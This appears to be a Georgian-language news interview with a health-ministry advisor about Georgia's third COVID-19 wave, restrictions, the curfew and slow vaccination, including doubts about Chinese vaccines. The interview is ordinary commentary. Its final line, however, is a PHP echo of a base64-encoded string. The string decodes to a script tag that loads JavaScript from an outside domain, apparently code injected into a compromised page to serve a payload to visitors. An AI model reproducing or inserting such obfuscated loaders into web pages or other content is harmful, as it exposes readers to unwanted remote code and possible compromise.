celsiusi
ავერსი საქკაბელი

ინტერვიუ ნორვეგიის სამეფოს ჯანდაცვის სამინისტროს უფროსის მრჩეველთან ზაზა წერეთელთან.

ბატონო ზაზა, საქართველოში ვირუსის გავრცელების მესამე ტალღის დაწყების შესახებ კეთება განცხადებები, თქვენ, საქართველოში არსებულ ეპიდმგომარეობას როგორ აფასებთ?

მე ვფიქრობ რომ მესამე ტალღა უკვე დაწყებულია და შემთხვევების დღევანდელი რაოდენობაც - 1374-1085 ამის ნათელი მაგალითია. იმ მომენტში, როდესაც მოსახლოებაში ჯერ კიდევ არ არის დიდი იმუნური ფენა, როგორც ვარაუდობენ ეს უნდა იყოს დაახლოებით მოსახლოების 85%,  შემთხვევების რაოდენობის ზრდა ყოველთვის მოსალოდნელია. ეს მითუმეტეს უფრო ადვილად ხდება მაშინ როდესაც შეზღუდვები შემსუბუქდება (რას საქართველომ გააკეთა რამდენიმე ხნის წინ), მოსახლეობის გარკვეული ნაწილი არ იცავს საჭირო წესებს, როდესაც ვაქცინაციის პროცესი ახალი დაწყებულია და  მოცვა ძალიან მცირეა.  

სეზღუდვების შემსუბუქების საკითხს შეეხეთ, ბუნებრივია, მეც უნდა გკითხოთ ხელისუფლების მერ გადადგმულ ნაბიჯებზე. ეტაპობრივად რეგულაციები მოიხსნა საქართველოში, ეკონომიკა გაიხსნა და სკოლებმაც დაიწყეს ბავშვების მიღება. როგორია თქვენი შეფასება, ხელისუფლების მხრიდან  ჯერ დაწესებულ, შემდეგ კი მოხსნილ რეგულაციებზე?

როგორც ზემოთ უკვე ავღნიშნე, საქართველომ ძალიან სწრაფად მოხსნა შეზღუდვების უმრავლესობა და ეს იმ მომენტში ,როდესაც ევროპის უმეტეს ქვეყნებში უკვე დაწყებული იყო მესამე ტალღა ,ვრცელდებოდა ვირუსის ახალი შტამები (დიდი ბრიტანეთის და სამხრეთ აფრიკის) და ქვეყანაში ვაქცინაციის პროცესი კი ძალიან ნელა მიმდინარეობდა. გასაგებია, რომ ქვეყანამ იმ მომენტში მიიღო გადაწყვეტილება ქვეყნის ეკონომიკის გახსნის მიზნით, მაგრამ ვფიქრობ რომ შეზღუდვები მაინც ცოტა უფრო ნელა უნდა მოხსნილიყო და ალბათ არ უნდა ეჩქარათ ამის გაკეთება. ყველას, მათ შორის ბიზნესის წარმომადგენელბსაც უნდა ესმოდეთ რომ ამ პანდემიის დროს ცოტა სხვანაირად უნდა ვაფასებდეთ სიტუაციას.  ჩვენ ახალ რეალობაშ ვცხოვრობთ და დროა ალბათ ყველა მიხვდეს ამას.  

როგორც კი დაიწყო საუბარი მესამე ტალღაზე, საზოგადოებაში ისევ გაჩნდა შიში მოსალოდნელი ლოქდაუნის, როგორ ფიქრობთ, მესამე ტალღის გადალახვას ლოქდაუნისგარეშე შეძლებს ქვეყანა?

როგორ მსოფლიო გამოცდილება აჩვენებს, ამ ტალღების გადალახვა ამ ეტაპზე „ლოქდაუნების“ გარეშე ძალიან ძნელია, თითქმის წარმოუდგენელია.  აქვე უნდა აღინიშნოს, რომ ბევრ ქვეყანაში ეს შეზღუდვები კიდევ უფრო მკაცრი იყო ვიდრე საქართველოში და უფრო ხანგრძლივიც. მაგალითისათვის ნიდერლანდებში კაფეებიდა რესტორნები უკვე 6 თვეა ჩაკეტილია და კომენდანტის საათიც მუშაობს. ის კი არა და საზოგადოებრივი თავშეყრის ადგილებში 2 კაცზე მეტის ყოფნაც კი არ არის დაშვებული.  შესაძლებელია ზოგმა აღნიშნოს, რომ მაგალითად ევროპული ქვეყნები უფრო ძლიერები არიან ეკონომიურად და ამიტომაც ამის გამო შეუძლიათ უფრო „ადვილად“ გადაიტანონ ეს შეზღუდვები ვიდრე საქართველომ.  მაგრამ საქმე იმაშია რომ ამ ეტაპზე სანამ ვაქცინაცია არ არის მასობრივი, სანამ ეფექტური სამკურნალო საშუალება ჯერ არ გამოჩენილა, მხოლოდ შეღუდვებია ის ერთადერთი საშუალება რომელიც აძლევს ქვეყნებს საშუალებას თავი დაიცვან ვირუსის მასობრივი გავრცელებისგან. ახლა დაიწყება შემთხვევების მატება საქართველოში, საავადმყოფოებში ისევ უამრავი ადამიანი მოხვდება და ჯანდაცვის მყიფე სისტემას ისევ დიდი დატვირთვა ექნება.  სწორედ ასეთი მძიმე სიტუაცია რომ ავიცილოთ თავიდან, ამიტომ არის საჭირო ეს შეზღუდევბი, თორემ დამიჯერეთ ნამდვილად არავის უხარია მათი შემოღება .

საუბარში კომენდანტი საათის საკითხს შეეხეთ, საქართევლოში საზოგადოების ნაწილი დღემდე აპროტესტებს კომენდატი საათის არსებობას და ხელისუფლებას ან გადაწევას 00:00 საათამდე ან საერთოდ გაუქმებას სთხოვს. თქვენ, რა აზრის ხართ ამ რეგულაციის არსებობაზე?

სიტუაცია ასეთია:  ყველამ იცის, რომ ვირუსის გავრცელებას ხელს უწყობს მასობრივი თავშეყრები, განსაკუთრებით ჩაკეტილ სივრცეში.  მიუხედავად არსებული შეზღუდვებისა, საქართველოში, როგორც ალბათ ბევრ სამხრეთულ ქვეყანაში, ძალიან უყვართ მასობრივი თავშეყრა და დროის ტარება.  სხვათაშორის, შარშან, ყველას კარგად გვახსოვს რა მძიმე ვითარება იყო იტალიასა და ესპანეთში, ერთ-ერთი მიზეზი ამის იყო ის ,რომ იქაურმა მოსახლეობამ ვერ მოიშალა საღამოობით შეკრება. ყველამ კარგად ვიცით ამ პერიოდშიც კი, როცა ქვეყანაში პანდემიაა, მოსახლეობა აგრძელებს დიდი შეკრებებს, ქორწილი იქნება ეს თუ უბრალოდ მეგობრების შეკრება. ასეთი შეკრებები ნამდვილად დამღუპველია ამ სიტუაციაში და ალბათ სახელმწიფო ფიქრობს რომ კომენდანტის საათით ცოტათი მაინც ხელს უშლის ასეთ შეკრებებს.  თუმცა ,ალბათ კარგი იქნებოდა ,რომ როგორც ბევრმა ქვეყანამ დააწესა-უბრალოდ აკრძალულიყო, ვთქვათ 6 კაცზე მეტის შეკრება და დაწესებულიყო ამის მკაცრი კონტროლი. კარგი იქნებოდა რომ მოსახლეობაც ცოტა გაგებით მოკიდებოდა პანდემიურ სიტუაციას და თავი შეეკავებინა ასეთი თავშეყრებისგან.  

ერთ-ერთ მნიშვნელოვან საკითხზეც უნდა დაგისვათ კითხვა. ქვეყანაში ოფიციალურად 15 მარტს დაიწყო ვაქცინაციის პროცესი. 12 პრილის მონაცემებით, 20 000-მდეა მხოლოდ აცრილი. თქვენ რას უკავშირებთ ვაქცინაციის ნელ ტემპებს?

ვაქცინიაციი ნელი ტემპები რამდენიმე ფაქტორით არის განპირობებული.  პირველი ის, რომ ქვეყანაში არ ჩატარებულა საინფორმაციო კამპანია, განსაკუთრებით ექიმებს შორის, ვაქცინაციის აუცილებლობის და ყველა იმ საკითხის ირგვლივ, რომელიც კოვიდ ვაქცინებს ეხება. საქართველოში ძლიერია ანტივაქსერული მოძრაობა და სამწუხაროდ, სახელმწიფომ მას არაფერი დაუპირისპირა. ცხადია უარყოფითი გავლენა მოახდინა იმ საბედისწერო შემთხვევამაც, როცა ვაქცინაციის პირველივე დღეებში ახალგაზრდა ექთანი დაიღუპა.  ამას დაემატა ასტრაზენეკას ვაქცინასთან  დაკავშირებით  გარკვეული პრობლემები ევროპაში და ყველაფერმა ამან კომლექსურად იმოქმედა ვაქცინაციის ტემპზე საქართველოში, რომელიც შეიძლებ ითქვას არის ძალიან დაბალი.  სამწუხაროდ, საინფორმაციო კამპანია და მოსახლოებასთან დიალოგი ვაქცინების ირგვლივ კვლავ ძალიან ნელი ტემპით მიმდინარეობს და ამიტომ საქართველოს ამბიციური გეგმა რომ წლის ბოლოს უნდა იყოს აცრილი მოსახლოების 60% ძალიან პრობლემურად ჩანს.

საქართველომ ჩინეთიდან 100 ათასი ჩინური ვაცინა შეიძინა, გუშინ ჩინეთის დაავადებათა კონტროლის ცენტრის ხელმძღვანელი აცხადებს, რომ ჩინური წარმოების ვაქცინები დაბალეფექტურიაო. რა გავლენას იქონიებს თქვენი აზრით ეს ფაქტი ვაქცინაციის პროცესზე?  იმის გათვალისწინებით, რომ მოსახლეობის ნაწილში ვაქცინის მიმართ ნდობა დაბალია...

ვფიქრობ რომ ისეთი ვაქცინის შემოტანა, რომლის ირგვლივაც უამრავი კითხვაა, დაწყებული მისი ეფექტურობიდან დამთავრებული გვერდით მოვლენების არსებობის შესახებ არის დიდი რისკის მატარებელი ვაქცინაციის პროცესისთვის.  როდესაც უმეტესობა აღნიშნავს მსოფლიოში, რომ ამ ვაქცინების ირგვლივ ინფორმაციის სიმწირეა, ეს დადებითად ნამდვილად ვერ იმოქმედებს ქვეყნის ვაცინაციის პროგრამაზე. მითუმეტეს, თუ გავითვალიწინებთ იმას, როგორც თქვენ სწორედ აღნიშნეთ, რომ საქართველოში ძალიან დიდია სკეპტიციზმი ზოგადად კოვიდ ვაქცინების მიმართ. ამას ემატება ის ფაქტიც, რომ ჩინური ვაქცინები ჯერ არ არის დამტკიცებული ჯანდაცვის მსოფლიო ორგანიზაციის მიერ, ხოლო ევროპა და ამერიკა არც განიხილავს ჯერ ამ ვაქცინებისათვის გადადუდებელი ხმარებისათვის ნებართვის მიცემას. უნგრეთი გამონაკლისია და მას თავისი მიზეზები აქვს ამისათვის.

და, რა მიზეზები აქვს უნგრეთს და რატომაა გამონაკლისი?

უნგრეთმა სპეციალურად ჩინეთისათვის დაუშვა გამონაკლისი და შეცვალა თავისი კანონმდებლობა. რის შედეგადაც ეს ვაქცინა უნგრეთში დამტკიცდა მარეგულირებლის განხილვის გარეშე. უნგრეთს უყვარს ხოლმე ევროკავშირის წინააღმდეგ წასვლა და ჩინეთმაც გამოიყენა ეს თავისი გეოპოლიტიკური ინტერესების გასატარებლად. ვაქცინა ახალა გადაიქცა გეოპოლიტიკის ნაწილად და ჩინეთიდა რუსეთი ყველანაირადა ცდილობს ამის მაქსიმალურად გამოყენებას.

რა ნაბიჯები უნდა გადაიდგას იმისათვის, რომ ვაქცინაციის პროცესი უფრო ეფექტური გახდეს?

ალბათ, ქვეყანა  ყველანაირად უნდა ეცადოს, რომ მოსახლოებაში გაიზარდოს ნდობა ვაქცინაციის პროგრამის მიმართ.  მოსახლოება უნდა იყოს დარწმეუნებული არა მარტო იმაში რომ ვაქცინა უსაფრთხოა, არამედ იმაშიც, რომ ვაქცინაციის პროცესის უსაფრთხოდ წარიმართება და თუკი რამე მოხდება და მას დახმარება დასჭირდება, სამეციდინო სისტემა მზად იქნება ამ დახმარების გაწევისთვის. არაფერს ვამბობ იმაზე, რომ ქვეყანას უნდა ჰქონდეს საკმარისი რაოდენობის მაღალი ხარისხის ვაქცინები, რაც ამ მომენტისათვის ასევე პრობლემაა საქართველოში.

რას ურჩევდით საქართველოს ხელისუფლებს, ქვეყანაში არსებული მდგომარეობის გათვალისწინებით?

ზედმეტად ოპტიმისტური განცხადებების შემცირება, განსაკუთრებით მაშინ როცა ამ ოპტიმიზიმის საფუძველი არ არის.    მეტი საუბარი მოსახლეობასთან, განსაკუთრებით იმ პრობლემების ირგვლივ რომელიც არსებობს, რათა მოსახლეობაში ნდობა ამაღდეს. ინფორმაციის ღიაობა და ახნა თუ რატომ ღებულობს ამათუ იმ გადაწყვეტილებას შეზღუდვებთან დაკავშირებით. მოსახლეობას უნდა სჯეროდეს და ნდობა უნდა ჰქონდეს სახელმწიფოსი რომ გაჰყვეს მას სახელმწიფოს მიერ გამოცხადებული ღონისძიებების ჩატარებაში. წინააღმდეგ შემთხვევაში, ამ შეზღუდვების შემოღებას ნაკლები ეფექტურობა აქვს. 

შეზღუდვების მკაცრი კონტროლი და შეზღუდვების წესების პატივისცემა ყველას მიერ, ყოველგვარი გამონაკლისების გარეშე. მუშაობის გააქტივება რომ ქვეყანაში ევროკაშვირისა და ამერიკის მიერ აღიარებული ვაქცინები შემოვიდეს და რაც შეიძლება სწრაფად, თუმცა ეს უკანასკნელი ამ ეტაპზე პრობლემაა,იმდენად გვიან დაიწყო ქვეყანამ ამაზე მუშაობა.  ტესტირების პროცესის გაზრდა და კარანტინისა და იზოლაციის წესების მაქსიმალურად დაცვა.

წინ კიდევ რთული თვეები გველის და ყველამ ერთად უნდა ვეცადოთ რომ ის გადავლახოთ. სახელმწიფო უნდა დაუდგეს მოსახლოებას გვერდით და მოსახლეობამაც უნდა იტვირთოს ვალდებულება რომ ყველეფერი გააკეთოს რათა სახელმწიფომ რაც შეიძლება ნაკლები დანაკარგებით გადაიტანოს ეს პანდემია. ჩვენ ახლა სრულად ახალ რეალობაში ვცხოვრობთ და რაც უფრო მალე გავითავისებთ ამას, მით უფრო ნაკლები დანაკარგებით გამოვალთ ამ სიტუაციიდან.

 

1772
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");